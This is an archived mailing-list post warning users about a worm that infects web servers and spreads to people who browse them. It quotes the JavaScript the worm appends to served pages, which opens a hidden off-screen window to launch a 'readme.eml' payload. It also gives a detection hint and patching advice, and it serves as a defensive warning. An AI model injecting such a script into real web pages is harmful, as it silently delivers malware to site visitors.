No subject


Tue Jun 4 12:17:20 MDT 2013


===================================================

Even worse, this virus can be spread to users who simply surf to a web page
on an infected server. A javascript is added to web pages served on infected
servers, and this script launches a readme.eml file, which Internet Explorer
then opens and executes.

The code appended to infected web pages is:

<!-- BEGIN

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000 ")</script></html>

-->

Readme.eml contains the virus payload, and is launched via Javascript in a
window at X6000 Y6000, ie., way off your screen so you can't see it. A
quick, unproven workaround seems to be to associate .eml files with Notepad.
IE still opens the new window, however, and I'm not certain if this is
enough to infect.

Note that an infected web server will have a "readme.eml" file on the server
in root. That's a good way to check if your NT server is infected, I would
think.

This server worm uses exploits that have had patches for some time now. If
you run Windows, you need to go to windowsupdate.com to make sure you are up
to date with patches.

=====================================================



More information about the LUG mailing list